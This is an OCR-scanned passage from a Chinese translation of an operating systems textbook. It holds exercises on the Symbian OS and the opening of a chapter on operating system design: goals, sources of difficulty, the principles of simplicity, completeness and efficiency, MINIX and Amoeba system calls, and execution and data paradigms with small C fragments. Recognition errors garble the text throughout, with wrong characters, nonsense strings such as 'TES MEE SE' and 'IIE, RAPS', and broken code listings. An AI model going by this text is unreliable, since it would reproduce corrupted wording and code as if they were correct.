3. 列 举 微 内 核 设计 市 来 的 三 个 效率 问题 。 


4.Symbian 探 作 系 统 将 其 内 核 分 割 为 纳 核 和 Sym-bian 内 核 两 部 
如 动态 内 存 管 理 之 类 的 服务 被 认为 过 于 复杂 而 不 能 进入 纳 核 。 描 述 动 
态 内 存 管 理 中 的 复杂 模块 ， 解 释 为 什么 不 能 将 其 放 进 微 内 核 。 


ak 
> 


5. 我 们 讨论 过 ， 活 动 对 象 使 得 MO 操作 更 有 效率 。 你 认为 应 用 程序 
是 否 能 够 同时 使 用 多 个 活动 对 象 ? 系统 在 多 个 MO 事件 发 生 时 会 如 何 员 
hy? 

6.Symbian 操 作 系统 中 的 安全 是 否 关 注 软件 安装 和 应 用 程序 的 


Symbian 等 名 ? 这 是否 足够 安全 ? 是 否 会 有 某 个 场景 ， 应 用 程序 可 以 
不 必 安 装 即 被 运行 ? (提示 : 考虑 手机 数据 输入 的 所 有 可 能 方式 ) 


7. 在 Symbian 操作 系统 中 ， 广 泛 应 用 了 基于 服务 的 对 共 邓 货 源 的 保 
护 。 列 举 三 种 在 微 内 核 环境 下 ， 这 种 方式 协调 次 源 的 优势 。 思 考 这 些 
优势 对 不 同体 系 结构 的 影响 。 


第 13 章 ”操作 系统 设计 


在 过 去 的 12 章 中 ， 我 们 讨论 了 许多 话题 并 且 分 析 了 许多 与 操作 系 
统 相关 的 概念 和 实例 。 但 是 研究 现 有 的 操作 系统 不 同 于 设计 一 个 者 的 
操作 系统 。 在 本 章 中 ， 我 们 将 俏 述 操作 系统 设计 人 员 在 设计 与 实现 一 
个 新 系统 时 必须 要 考虑 的 某 些 问题 和 权衡 。 


在 系统 设计 方面 ， 关 于 什么 是 好 ， 什 么 是 坏 ， 存 在 着 一 定数 量 的 
民间 传说 在 操作 系统 弄 流 传 ， 但 是 令 人 吃惊 的 是 这 些 民间 传说 很 少 被 
记录 下 来 。 最 重要 的 一 本 书 可 能 是 Fred Brooks 的 经 典 著 作 The Mythical 
Man Month (中 文 译名 《人 月 神话 》) 。 在 这 本 书 中 ， 作 者 讲述 了 他 
在 设计 与 实现 IBM OS/360 系 统 时 的 经 历 。 该 书 的 20 周 年 纪念 版 修订 了 
某 些 素材 并 且 新 增加 了 4 章 (Brooks,1995) ° 


有 天 操作 系统 设计 的 三 篇 经 典 论文 是 “Hints for Computer System 
Design”( 计 算 机 系统 设计 的 忠告 ，Lampson,1984) 、“On Building 
Systems that Will Fail”( 论 建造 将 要 失败 的 系统 ，Corbat6,1991) 

和 “End-to-End Arguments in System Design” (系统 设计 中 端 到 端的 论 
据 ，Saltzer 等 人 ，1984) 。 与 Brooks 的 著作 一 样 ， 这 三 篇 论文 都 极其 
出 色 地 经 历 了 岁月 的 考验 ， 其 中 的 大 多 数 真知 灼 见 在 今天 仍然 像 文 草 
目次 发 表 时 一 样 有 效 。 


本 章 吸 收 了 这 些 资料 来 源 ， 另 外 加 上 了 作者 作为 三 个 系统 的 设计 
者 或 合作 设计 者 的 个 人 经 历 ， 这 三 个 系统 是 : Amoeba (Tanenbaum 等 
人 ，1990) 、MINIX (Tanenbaum 和 Woodhull,1997) 和 Globe (Van 
Steen 等 人 ，1999a) 。 由 于 操作 系统 设计 人 员 在 设计 操作 系统 的 最 优 
方法 上 没有 达成 共识 ， 因 此 与 前 面 各 章 相 比 ， 本 章 更 加 主观 ， 也 无 疑 
更 具有 和 争议 。 


13.1 设计 问题 的 本 质 


操作 系统 设计 与 其 说 是 精确 的 科学 ， 不 如 六 是 一 个 工程 项 目 。 设 
置 清晰 的 目标 并 且 满 足 这 些 目标 非常 困难 。 我 们 将 从 这 些 观点 开始 讨 


论 。 


13.1.1 目标 


为 了 设计 一 个 成 功 的 操作 系统 ， 设 计 人 员 对 于 需要 什么 必须 有 清 
晰 的 思路 。 缺 乏 目标 将 使 随后 的 决策 非常 难于 做 出 。 为 了 明确 这 一 
点 ， 看 一 看 两 种 程序 设计 语言 PL/II 和 C 会 有 所 启发 。PL/I 是 IBM 公 司 在 
20 世 纪 60 年 代 设 计 的 ， 因 为 在 当时 必须 支持 FORTRAN 和 COBOL 是 一 
件 令 人 讨厌 的 事 ， 同 时 令 人 乾 俯 的 是 ， 学 术 界 背地 里 吐 哈 着 Algol 比 这 
两 种 语言 都 要 好 。 所 以 IBM 设 立 了 一 个 委员 会 来 创作 一 种 语言 ， 该 语 
言 力图 满足 所 有 人 的 需要 ， 这 种 语言 束 是 PL/1。 它 具有 一 些 


FORTRAN 的 特点 、 一 些 COBOL 的 特点 和 一 些 Algol 的 特点 。 但 是 该 语 
言 失败 了 ， 因 为 它 缺 乏 统 一 的 洞察 力 。 它 只 是 彼此 互相 竞争 的 功能 特 
性 的 大 杂烩 ， 并 且 过 于 笨重 而 不 能 有 效 地 编译 。 


现在 考察 C 语 言 。 它 是 一 个 人 (Dennis Ritchie) 为 了 一 个 目的 
(系统 程序 设计 ) 而 设计 的 。C 语 言 在 所 有 的 方面 都 取得 了 巨大 的 成 
功 ， 因 为 Ritchie 知 道 他 需要 什么 ， 不 需要 什么 。 结 果 ， 在 面世 几 十 年 
之 后 ，C 语 言 仍然 在 广泛 使 用 。 对 于 需要 什么 要 有 一 个 清晰 的 洞察 力 
是 至 关 重 要 的 。 


操作 系统 设计 人 员 需 要 什么 ? 很 明显 ， 不 同 的 系统 会 有 所 不 同 ， 
舱 入 式 系统 就 不 同 于 服务 着 系统 。 然 而 ， 对 于 通用 的 操作 系统 而 言 ， 
需要 留心 4 个 基本 的 要 素 : 


1) 定 义 抽象 概念 。 
2) 提 供 基本 操作 。 
3) 确 保 隔离 。 
4) 管 理 人 硬件。 
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一 个 操作 系统 最 重要 但 可 能 最 困难 的 任务 是 定义 正确 的 抽象 概 
念 。 有 一 些 抽象 概念 ， 例 如 进程 和 文件 ， 多 年 以 前 就 已 经 提出 来 了 ， 
似乎 比较 显而易见 。 其 他 一 些 抽象 概念 ， 例 如 线程 ， 还 比较 新 鲜 ， 开 
不 那么 成 熟 了 。 例 如 ， 如 果 一 个 多 线程 的 进程 有 一 个 线程 由 于 等 待 键 
盘 输 入 而 阻塞 ， 那 么 由 这 个 进程 通过 调用 fork 函 数 创 建 的 新 进程 是 否 
也 包 合 一 个 等 待 键盘 输入 的 线程 ? 其 他 的 抽象 概念 涉及 同步 、 信 和 号 、 
内 存 模型 、IO 的 建 模 以 及 其 他 领域 。 


每 一 个 抽象 概念 可 以 采用 具体 数据 结构 的 形式 实例 化 。 用 户 可 以 
创建 进程 、 文 件 、 信 与 量 等。 基本 操作 则 处 理 这 些 数据 结构 。 例 如 ， 
用 户 可 以 读 写 文件 。 基 本 操作 以 系统 调用 的 形式 实现 。 从 用 户 的 观点 
来 看 ， 操 作 系 统 的 核心 是 由 抽象 概念 和 其 上 的 基本 操作 所 构成 的 ， 而 
基本 操作 则 可 通过 系统 调用 加 以 利用 。 


由 于 多 个 用 户 可 以 同时 登录 到 一 人 台 计 算 机 ， 操 作 系统 需要 提供 机 
制 将 他 们 隔离 。 一 个 用 户 不 可 以 干扰 另 一 个 用 户 。 为 了 傈 护 的 目的 ， 
进程 概念 广 沁 地 用 于 将 资源 集合 在 一 起 。 文 件 和 其 他 数据 结构 一 般 也 
征 受 保护 的 。 确 保 每 个 用 户 只 能 在 授权 的 数据 上 执行 授权 的 操作 是 系 
统 设计 的 关键 目标 。 然 而 ， 用 户 还 希望 共享 数 据 和 资源 ， 因 此 隅 离 必 
须 是 选择 性 的 并 且 要 在 用 户 的 控制 之 下 。 这 束 使 问题 更 加 复杂 化 了 。 
电子 邮件 程序 不 应 该 弄 坏 Web 浏览 作 程 序 ， 即 使 只 有 一 个 用 户 ， 不 同 
的 进程 也 应 该 隔离 开 来 。 
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的 角度 看 ， 操 作 系 统 的 各 部 分 也 应 该 相互 隔离 ， 以 便 使 故障 独立 。 


最 后 ， 操 作 系 统 必须 管理 硬件 。 特 别 地 ， 它 必须 处 理 所 有 低级 心 
刻 ， 例 如 中 断 控 制 嚣 和 总 线 控制 器 。 它 还 必须 提供 一 个 框架 ， 从 而 使 
设备 驱动 程序 得 以 管理 更 大 规模 的 VO 设备 ， 例 如 磁盘、 打印 机 和 显示 


BH 


any ° 


13.1.2 ”设计 操作 系统 为 什么 困难 


摩尔 定律 表明 计算 机 硬件 每 十 年 改进 100 倍 ， 但 却 没有 一 个 定律 宣 
称 操 作 系 统 每 十 年 改进 100 倍 。 甚 至 没有 人 能 够 宣称 操作 系统 每 十 年 在 
某 种 程度 上 会 有 所 改善 。 事 实 上 ， 可 以 举 出 事例 ， 一 些 操作 系统 在 很 
多 重要 的 方面 〈 例 如 可 靠 性 ) 比 20 世 纪 70 年 代 的 UNIX 版 本 7 还 要 精 


为 什么 会 这 样 ? 大 部 分 责任 常常 归 答 于 惯性 和 汤 望 向 后 兼容 ， 不 
能 坚持 良好 的 设计 原则 也 是 问题 的 根源 。 但 是 还 不 止 这 些 。 操 作 系统 
在 特定 的 方面 根本 不 同 于 计算 机 商店 以 49 美 元 销售 的 小 型 应 用 程序 。 
我 们 下 面 就 看 一 看 使 设计 一 个 操作 系统 比 设计 一 个 应 用 程序 要 更 加 困 
难 的 8 个 问题 。 


第 一 ， 操 作 系 统 已 经 成 为 极其 庞大 的 程序 。 没 有 一 个 人 能 够 坐 在 
一 台 PC 机 前 在 几 个 月 内 匆匆 地 完成 一 个 严肃 的 操作 系统 。UNIX 的 所 
有 当前 版 本 都 超过 了 300 万 行 代码 ，Windows Vista 有 超过 500 万 行 的 内 
核 代 码 (全 部 代码 超过 7 亿 行 ) 。 没 有 一 个 人 能 够 理解 300 万 到 500 万 行 
代码 ， 更 不 必 说 7 亿 行 代码 。 当 你 拥有 一 件 产 品 ， 如 果 没 有 一 名 设计 师 
能 够 有 望 完 全 理解 它 时 ， 结 果 经 常 远 没有 达到 最 优 也 就 不 难 预料 了 。 


操作 系统 不 是 世界 上 最 复 光 的 系统 ， 例 如 ， 航 空 母 舰 束 要 复 洒 得 
多 ， 但 是 航空 母 舰 能 够 更 好 地 分 成 相互 隔离 的 部 分 。 设 计 航空 母 舰 上 
的 卫生 间 的 人 员 根 本 不 必 关 心 雷达 系统 ， 这 两 个 子 系统 没有 什么 相互 
作用 。 而 在 操作 系统 中 ， 文 件 系统 经 常 以 意外 的 和 无 法 预料 的 方式 与 
内 存 系统 相互 作用 。 


第 二 ， 操 作 系 统 必须 处 理 并 发 。 系 统 中 往往 存在 多 个 用 户 和 多 个 
设备 同时 处 于 活动 状态 。 管 理 并 发 卓然 要 比 管理 单一 的 顺序 活动 复杂 
得 多 。 苋 争 条件 和 死 锁 只 是 出 现 的 问题 中 的 两 个 。 


第 三 ， 操 作 系 统 必须 处 理 可 能 有 敌意 的 用 户 一 一 想 要 干扰 系统 的 
用 户 或 者 做 不 允许 做 的 事情 《例如 偷窃 另 一 个 用 户 的 文件 ) 的 用 户 。 
操作 系统 需要 采取 措施 阻止 这 些 用 户 不 正当 的 行为 ， 而 字 处 理 程序 和 
照片 编辑 程序 就 不 存在 这 样 的 问题 。 


第 四 ， 尽 管事 实 上 并 非 所 有 的 用 户 都 相信 其 他 用 户 ， 但 是 许多 用 
尸 确 实 布 望 与 经 过 选择 的 其 他 用 户 共 至 他 们 的 信息 和 资源 。 控 作 系统 
必须 使 其 成 为 可 能 ， 但 是 要 以 确保 怀 有 恶意 的 用 户 不 能 妨害 的 方式 。 
而 应 用 程序 就 不 会 面 对 类 似 这 样 的 挑战 。 


第 五 ， 操 作 系 统 已 经 问世 很 长 时 间 了 “。UNIX 已 经 历 了 四 分 之 一 个 
世纪 ，Windows 面 世 也 已 经 超过 二 十 年 并 且 还 没有 消退 的 迹象 。 
此 ， 设 计 人 员 必 须 思考 硬件 和 应 用 程序 在 遥远 的 未 来 可 能 会 发 生 的 变 


化 ， 并 且 考 虑 为 这 样 的 变化 做 怎样 的 准备 。 紧 密 地 局 限于 世界 的 一 个 
特定 视野 的 系统 通常 不 会 存世 太 久 。 


第 六 ， 操 作 系 统 设计 人 员 对 于 他 们 的 系统 将 怎样 被 人 使 用 实际 上 
并 没有 确切 的 概念 ， 所 以 他 们 需要 提供 相当 程度 的 通用 性 。UNIX 和 
Windows 在 设计 时 都 没有 把 电子 邮件 或 Web 浏 览 亏 放 在 心 上 ， 然 而 许 
多 运行 这 些 系统 的 计算 机 却 很 少 做 其 他 的 事情 。 人 们 在 告诉 一 名 轮船 
设计 师 建 造 一 艘 轮船 时 ， 却 会 指明 他 想 要 的 十 渔船 、 游 船 还 十 战舰 ， 
并 且 当 产品 生产 出 来 之 后 鲜 有 人 会 改变 产品 的 用 途 。 


第 七 ， 现 代 操 作 系 统一 般 被 设计 成 可 移植 的 ， 这 意味 着 它们 必须 
TES MEE SE ° Chao mscHETMOKE, MAAS 
1/O 设 备 都 是 独立 设计 的 ， 彼 此 之 间 没 有 关系 。 这 样 的 差异 可 能 会 导致 
问题 ， 一 个 例子 是 操作 系统 需要 运行 在 小 端 机 器 和 大 妆 机 右上 。 第 二 
个 例子 经 党 在 MS-DOS 下 看 到 ， 用 户 试 独 安 半 一 块 声卡 和 一 个 调制 解 
调 器 ， 而 它们 使 用 了 相同 的 IO 端口 或 者 中 断 请 求 线 。 除 了 操作 系统 以 
外 ， 很 少 有 程序 必须 处 理由 于 硬件 部 件 冲 突 而 导致 的 这 类 问题 。 


第 八 ， 也 是 最 后 一 个 问题 ， 是 经 常 需要 与 某 个 从 前 的 操作 系统 保 
持 回 后 兼容 。 以 前 的 那个 系统 可 能 在 字 长 、 文 件 名 或 者 其 他 方面 有 所 
限制 ， 而 在 设计 人 员 现在 看 来 这 些 限制 都 是 过 时 的 ， 但 是 却 必 须 坚 
持 。 这 吏 像 让 一 家 工厂 转 而 去 生产 下 一 年 的 汽车 而 不 古 这 一 年 的 汽车 
的 同时 ， 继 续 全 力 地 去 生产 这 一 年 的 汽车 。 


13.2 ”接口 设计 


到 现在 读者 应 该 清楚 ， 编 写 一 个 现代 操作 系统 并 不 容易 。 但 是 人 
们 要 从 何 处 开始 呢 ? 可 能 最 好 的 起 点 是 考虑 操作 系统 提供 的 接口 。 操 
作 系 统 提 供 了 一 组 抽象 ， 主 要 是 数据 类 型 〈 例 如 文件 ) 以 及 其 上 的 操 
作 (例如 read) 。 它 们 合 起 来 形成 了 对 用 户 的 接口 。 注 意 ， 在 这 一 上 
下 文中 操作 系统 的 用 户 是 指 编 写 使 用 系统 调用 的 代码 的 程序 员 ， 而 不 
征 运 行 应 用 程序 的 人 员 。 


除了 主要 的 系统 调用 接口 ， 大 多 数 操作 系统 还 具有 男 外 的 接口 。 
例如 ， 某 些 程序 员 需 要 编写 插入 到 操作 系统 中 的 设备 驱动 程序 。 这 些 
驱动 程序 可 以 看 到 操作 系统 的 某 些 功能 特性 并 且 能 够 发 出 某 些 过 程 调 
用 。 这 些 功 能 特性 和 调用 也 定义 了 接口 ， 但 是 与 应 用 程序 员 看 到 的 接 
口 完全 不 同 。 如 果 一 个 系统 要 取得 成 功 ， 所 有 这 些 接 口 都 必须 仔细 地 


设计 。 


13.2.1 指导 原则 


有 没有 指导 接口 设计 的 原则 ? 我 们 认为 是 有 的 。 人 简 而 言 之 ， 原 则 
就 是 简单 、 完 备 和 能 够 有 效 地 实现 。 


原则 1: 简单 


一 个 简单 的 接口 更 加 易于 理解 并 且 更 加 易于 以 无 差错 的 方式 实 
现 。 所 有 的 系统 设计 人 员 都 应 该 牢记 法 国 先驱 飞行 家 和 作家 Antoine de 
St.Exupéry 的 著名 格言 : 


这 一 原则 说 的 是 少 比 多 好 ， 至 少 在 操作 系统 本 身 中 是 这 样 。 这 一 
原则 的 另 一 种 说 法 是 KISS 原 则 : Keep It Simple,Stupid (保持 简 杆 无 


华 ) 。 
原则 2: 完备 


当然 ， 接 口 必须 能 够 做 用 户 需 要 做 的 一 切 事 情 ， 也 就 是 说 ， 它 必 
须 是 完备 的 。 这 使 我 们 想起 了 男 一 条 著名 的 格言 ，Albert Einstein ( 阿 
尔 伯 特 : 爱 因 斯 坦 ) 说 过 : 


万 事 都 应 该 尽 可 能 人 简单， 但 是 不 能 过 于 人 简单 。 


换言之 ， 操 作 系统 应 该 不 多 不 少 准 确 地 做 它 需 要 做 的 事情 。 如 果 
用 户 需 要 人 存储 数据 ， 它 束 必 须 提 供 存储 数据 的 机 制 ， 如 采用 户 需 要 与 
其 他 用 户 通信 ， 操 作 系统 就 必须 提供 通信 机 制 ， 如 此 等 等 。1991 年 ， 
CTSS 和 MULTICS 的 设计 者 之 一 Fernando Corbat6 在 他 的 图 灵 奖 演说 
中 ， 将 简单 和 完备 的 概念 结合 起 来 并 且 指 出 : 
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困难 并 且 产 生 错误 ， 正 如 我 们 已 经 看 到 的 那样 。 我 对 精练 的 定义 是 以 
机 制 的 最 少 化 和 清晰 度 的 最 大 化 实现 指定 的 功能 。 


此 处 重要 的 思想 是 机 制 的 最 少 化 (minimum of mechanism) 。 换 
言 之 ， 每 一 个 特性 、 功 能 和 系统 调用 都 应 该 尽 目 己 的 本 分 。 它 应 该 做 
一 件 事 情 并 且 把 它 做 好 。 当 设计 小 组 的 一 名 成 员 提 议 扩 充 一 个 系统 调 
用 或 者 添加 某 些 新 的 特性 时 ， 其 他 成 员 应 该 问 这样 的 问题 : “如 果 我 们 
省 去 它 会 不 会 发 生 可 怕 的 事情 ? PURE Ae: “不 会 ， 但 是 有 人 可 能 
会 在 某 一 天 发 现 这 一 特性 十 分 有 用 ””， 那 么 请 将 其 放 在 用 户 级 的 库 中 ， 
而 不 是 操作 系统 中 ， 尽 管 这 样 做 可 能 会 使 速度 慢 一 些 。 并 不 是 所 有 的 
特性 都 要 比 高 速 飞 行 的 子弹 还 和 要 快 。 目 标 是 保持 Corbat6 所 说 的 机 制 的 


最 少 化 。 


让 读者 简略 地 看 一 看 我 亲身 经 历 的 两 个 例子 : MINIX 

(Tanenbaum 和 Woodhull，2006) 和 Amoeba (Tanenbaum 等 人 ， 
1990) 。 实 际 上 ，MINIX 具 有 三 个 系统 调用 : send、receive 和 
sendrec。 系统 是 作为 一 组 进程 的 集合 而 构造 的 ， 内 存 管 理 、 文 件 系统 
以 及 每 个 设备 驱动 程序 都 是 单独 的 可 调度 的 进程 。 作 为 首要 的 近似 ， 
内 核 所 做 的 全 部 工作 只 是 调度 进程 以 及 处 理 在 进程 之 间 传 递 的 消息 。 
因此 ， 只 需要 两 个 系统 调用 : send 发 送 一 条 消息 ， 而 receive 接 收 一 条 
消息 。 第 三 个 调用 sendrec 只 是 为 了 效率 的 原因 而 做 的 优化 ， 它 使 得 仅 


用 一 次 内 核 陷 阱 就 可 以 发 送 一 条 消息 并 且 请 求 应答 。 其 他 的 一 切 事情 
都 是 通过 请 求 某 些 其 他 进程 (例如 文件 系统 进程 或 磁盘 驱动 程序 ， 做 
相应 的 工作 而 完成 的 。 


Amoeba 甚 至 更 加 简单 。 它 仅 有 一 个 系统 调用 : 执行 远程 过 程 调 
用 。 该 调用 发 送 一 条 消 恩 并 且 等 待 一 个 应 答 。 它 在 本 质 上 与 MINIX 的 
sendrec 相 同 。 其 他 的 一 切 都 建立 在 这 一 调用 的 基础 上 。 


原则 3: 效率 


第 三 个 指导 方针 是 实现 的 效率 。 如 采 一 个 功能 特性 或 者 系统 调用 
不 能 够 有 效 地 实现 ， 或 许 吏 不 值得 包含 它 。 对 于 程序 员 来 说 ， 一 个 系 
统 调用 的 代价 有 多 大 也 应 该 在 直觉 上 十 显而易见 的 。 例 如 ，UNIX 程 序 
员 会 认为 lseek 系 统 调 用 比 read 系 统 调 用 要 代价 低廉 ， 因 为 前 者 只 是 在 
内 存 中 修改 一 个 指针 ， 而 后 者 则 要 执行 磁盘 IO。 如 采 直 觉 的 代价 是 错 
误 的 ， 程 序 员 束 会 写 出 效率 差 的 程序 。 


13.2.2 yo 


一 旦 确定 了 目标 ， 就 可 以 开始 设计 了 “。 一 个 良好 的 起 点 是 考虑 客 
尸 将 怎样 审视 该 系统 。 最 为 重要 的 问题 之 一 是 如 何 将 系统 的 所 有 功能 
特性 良好 地 结合 在 一 起 ， 并 且 展 现 出 经 常 所 说 的 体系 结构 一 致 性 
(architectural coherence) 。 在 这 方面 ， 重 要 的 是 区 分 两 种 类 型 的 操作 
系统 “客户 ”。 一 方面 ， 征 用 户 ， 他 们 与 应 用 程序 打交道 ， 必 一 方面 ， 
征程 序 员 ， 他 们 编写 应 用 程序 。 前 者 主要 涉及 GUI， 后 者 主要 涉及 系统 
调用 接口 。 如 琳 打 算 拥 有 遍及 整个 系统 的 单一 GUI， 束 像 在 Macintosh 
中 那样 ， 设 计 应 该 在 此 处 开始 。 然 而 ， 如 采 打 算 文 择 许 多 可 能 的 GUIL， 
怠 像 在 UNIX 中 那样 ， 那 么 束 应 该 首 移 设计 系统 调用 接口 。 首 先 设计 
GUI 本 质 上 是 自 顶 向 下 的 设计 。 这 时 的 问题 是 GUI 要 拥有 什么 功能 特 
性 ， 用 户 将 怎样 与 它 打 交道 ， 以 及 为 了 文 持 它 应 该 砾 样 设计 系统 。 例 
如 ， 如 有 果 大 多 数 程序 在 屏幕 上 显示 图 标 然后 等 待 用 户 在 其 上 点 击 ， 这 
暗示 着 GUI 应 该 采用 事件 驱动 模型 ， 并 且 操 作 系统 或 许 也 应 该 采用 事件 
驱动 模型 。 男 一 方面 ， 如 果 屏 幕 主要 被 文本 窗口 占据 ， 那 么 进程 从 刍 
盘 读 取 输 入 的 模型 可 能 会 更 好 。 


首先 设计 系统 调用 接口 是 自 底 向 上 的 设计 。 此 时 的 问题 是 程序 员 
通常 需要 哪些 种 类 的 功能 特性 。 实 际 上 ， 并 不 是 需要 许多 特别 的 功能 
寺 性 才能 支持 一 个 GUI。 例 如 ，UNIX 窗 口 系统 X 只 是 一 个 读 写 键盘 、 


-AT 


鼠标 和 屏幕 的 大 的 C 程 序 。X 是 在 UNIX 问 世 很久 以 后 才 开发 的 ， 但 是 
并 不 要 求 对 操作 系统 做 很 多 修改 整 可 以 使 它 工 作 。 这 一 经 历 验 证 了 这 
样 的 事实 : UNIX 是 十 分 完备 的 。 


LAP yee 


对 于 GUI 级 的 接口 和 系统 调用 接口 而 言 ， 最 重要 的 方面 是 有 一 个 民 
好 的 范 型 《有 时 称 为 隐喻 ) ， 以 提供 观察 接口 的 方法 。 人 台式 计 算 机 的 
许多 GUI 使 用 我 们 在 第 5 章 讨论 过 的 WIMP 泡 型 。 该 范 型 在 所 及 接口 的 
各 处 使 用 定点 -点 击 、 定 点 -双击 、 拖 动 以 及 其 他 术语 ， 以 提供 总 体 上 的 
体系 结构 一 致 性 。 对 于 应 用 程序 常常 还 有 额外 的 要 求 ， 例 如 要 有 一 个 
具有 文件 (FILE) 、 编 辑 (EDIT) 以 及 其 他 条 目的 菜单 栏 ， 每 个 条 目 
具有 某 些 众所周知 的 菜单 项 。 这 样 ， 熟 悉 一 个 程序 的 用 户 就 能 够 很 快 
地 学 会 男 一 个 程序 。 


然而 ，WIMP 用 户 界 面 并 不 十 惟一 可 能 的 用 户 界 面 。 茶 些 掌 上 型 计 
算 机 使 用 一 种 程式 化 的 手写 界面 。 专 用 的 多 媒体 设备 可 能 使 用 像 VCR 
一 样 的 界面 。 当 然 ， 语 音 输入 具有 完全 不 同 的 范 型 。 重 要 的 不 是 选择 
这 人 么 多 的 范 型 ， 而 是 存在 一 个 单一 的 统领 一 切 的 范 型 统一 整个 用 户 界 
面 。 


不 管 选 择 什么 范 型 ， 重 要 的 是 所 有 应 用 程序 都 要 使 用 它 。 因 此 ， 
系统 设计 者 需要 提供 库 和 工具 包 给 应 用 程序 开发 人 员 ， 使 他 们 能 够 访 


问 产 生 一 致 的 外 观 与 感觉 的 过 程 。 用 户 界 面 设 计 非 常 重要 ， 但 它 并 不 
年 本 书 的 主题 ， 所 以 我 们 现在 要 退回 到 操作 系统 接口 的 主题 上 。 


2. DUTT AL 


体系 结构 一 致 性 不 但 在 用 户 层 面 是 重要 的 ， 在 系统 调用 接口 层面 
也 同样 重要 。 在 这 里 区 分 执行 范 型 和 数据 范 型 解 筑 是 有 区 的 ， 所 以 我 
们 将 讨论 两 者 ， 我 们 以 前 考 为 开始 。 


两 种 执行 范 型 被 广泛 接受 : 算法 范 型 和 事件 驱动 范 型 。 算 法 范 型 
(algorithmic paradigm) 基于 这 样 的 思想 : 局 动 一 个 程序 是 为 了 执行 某 
个 功能 ， 而 该 功能 是 事先 知道 的 或 者 是 从 其 参数 获知 的 。 该 功能 可 能 
征 编 译 一 个 程序 、 编 制 工资 册 ， 或 者 是 将 一 洪 飞 机 飞 到 旧金山 。 基 本 
逻辑 被 硬 接 线 到 代码 当中 ， 而 程序 则 时 常 发 出 系统 调用 获取 用 户 输 
入 、 获 得 操作 系统 服务 等 。 图 13-1a 中 概括 了 这 一 方法 。 


main( ) main( ) 


{ 


Hat ss mess_t msg; 


init( ); 
while (get_message(&msg)) { 
switch (msg.type) { 


init( ); 
do_something( ); 
read(...); 

case 1:...; 
case 2: ...; 
case 3: ...; 


do_something _else( ); 
write(...); 
keep_going( ); 
exit(0); 


a) 


图 13-1) a) 算 法 代码 ，b) 事 件 驱 动 代码 


男 一 种 执行 范 型 是 图 13-1b 所 示 的 事件 驱动 范 型 (event-driven 
paradigm) ° 在 这 里 程序 执行 某 种 初始 化 〈 例 如 通过 显示 某 个 屏幕 ) ， 
然后 等 待 操 作 系统 告诉 它 第 一 个 事件 。 事 件 经 党 是 键 弄 敲 击 或 鼠标 移 
动 。 这 一 设计 对 于 高 度 交 互 式 的 程序 是 十 分 有 益 的 。 


这 些 做 事情 的 每 一 种 方法 造 束 了 其 特有 的 程序 设计 风格 。 在 算法 
范 型 中 ， 算 法 位 居中 心 而 操作 系统 被 看 作 是 服务 提供 着 。 在 事件 驱动 
苑 型 中 ， 操 作 系 统 同 样 捉 供 服务 ， 但 是 这 一 角色 与 作为 用 户 行为 的 协 
调 者 和 被 进程 处 理 的 事件 的 生产 者 相 比 就 没 那 么 重要 了 。 


3. 数 据 范 型 


执行 范 型 并 不 是 操作 系统 导出 的 惟一 范 型 ， 同 等 重要 的 范 型 是 数 
据 范 型 。 这 里 关键 的 问题 是 系统 结构 和 设备 如 何 展现 给 程序 员 。 在 早 
期 的 FORTRAN 批 处 理 系统 中 ， 所 有 一 切 都 是 作为 连续 的 磁 囊 而 建立 模 
型 。 用 于 读 入 的 卡片 组 被 看 作 输入 磁带 ， 用 于 穿孔 的 卡片 组 被 看 作答 
出 磁 市 ， 并 且 打 印 机 输出 被 看 作答 出 磁 市 。 磁 青 文件 也 被 看 作 和 位 市 。 
对 一 个 文件 的 随机 访问 是 可 能 的 ， 只 要 将 磁 市 倒 市 到 对 应 的 文件 并 且 
再 次 读 取 就 可 以 了 。 


使 用 作业 控制 卡片 可 以 这 样 来 实现 映射 : 


MOUNT ( TAPEO8, REEL781) 
RUN ( INPUT, MYDATA, OUTPUT, PUNCH, TAPE08 ) 


第 一 张 卡 片 指示 操作 员 去 从 磁带 架 上 取得 磁带 卷 781， 并 且 将 其 安 
装 在 磁带 驱动 器 8 上 。 第 二 张 卡 片 指 示 操 作 系 统 运行 刚刚 编译 的 
FORTRAN 程 序 ， 映 射 INPUT ( 意 指 卡片 阅读 机 ) 到 逻辑 磁带 1， 映 射 
位 盘 文 件 MYDATA 到 逻辑 磁带 2， 映 射 打 印 机 ( 称 为 OUTPUT) 到 逻辑 
磁带 3， 映 射 卡片 穿孔 机 ( 称 为 PUNCH) 到 逻辑 磁带 4， 并 且 映 射 物理 
磁带 驱动 器 8 到 逻辑 磁带 5 。 


FORTRAN 具 有 读 写 逻辑 磁带 的 语法 。 通 过 读 逻 辑 磁带 1， 程 序 获 
导 卡 片 输入 。 通 过 写 逻 辑 人 磁带 3， 输 出 随后 将 会 出 现在 打印 机 上 。 通 过 
读 逻 辑 磁 这 5， 人 磁带 卷 781 将 被 恋 入 ， 如 此 等 等 。 注 意 ， 磁 带 概念 
集成 卡片 阅读 机 、 打 印 机 、 穿 孔 机 、 磁 盘 文 件 以 及 磁带 的 一 个 范 
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WHE o 


IIE, RAPS — MORE, KARREN 
( 假 脱 机 ) 磁盘 文件 。 这 只 是 一 个 原始 的 范 型 ， 但 它 却 是 正确 方向 上 
的 一 个 开端 。 


后 来 ，UNIX 问 世 了 ， 它 采用 “所 有 一 切 都 是 文件 ”的 模型 进一步 发 
展 了 这 一 思想 。 使 用 这 一 范 型 ， 所 有 IO 设备 都 锌 看 作 走 文 件 ， 并 且 可 
以 像 普通 文件 一 样 打开 和 操作 。C 语 名 


fdi=open("file1",O_ RDWR); 
fd2=open("/dev/tty", O_RDWR); 


打开 一 个 真正 的 磁盘 文件 和 用 户 终端 。 随 后 的 语句 可 以 使 用 fda1 和 
fd2 分 别 读 写 它们 。 从 这 一 时 刻 起 ， 在 访问 文件 和 访问 终端 之 间 并 不 存 
在 考 异 ， 只 不 过 在 终端 上 寻 道 是 不 允许 的 。 


UNIX 不 但 统一 了 文件 和 IO 设备 ， 它 还 允许 像 访问 文件 一 样 通过 管 
道 访问 其 他 进程 。 此 外 ， 当 支持 映射 文件 时 ， 一 个 进程 可 以 得 到 其 自 
身 的 虚拟 内 存 ， 就 像 它 是 一 个 文件 一 样 。 最 后 ， 在 支持 /proc 文 件 系 统 
的 UNIX 版 本 中 ，C 语 句 


fd3=open("/proc/501",O_RDWR); 


人 允许 进程 (尝试 ) 访问 进程 501 的 内 存 ， 使 用 文件 描述 符 fd3 进 行 读 
和 写 ， 这 在 某 种 程度 上 是 有 益 的 ， 例 如 对 于 一 个 调试 器 。 


Windows Vista 更 进一步 ， 它 试图 使 所 有 一 切 看 起 来 像 是 一 个 对 
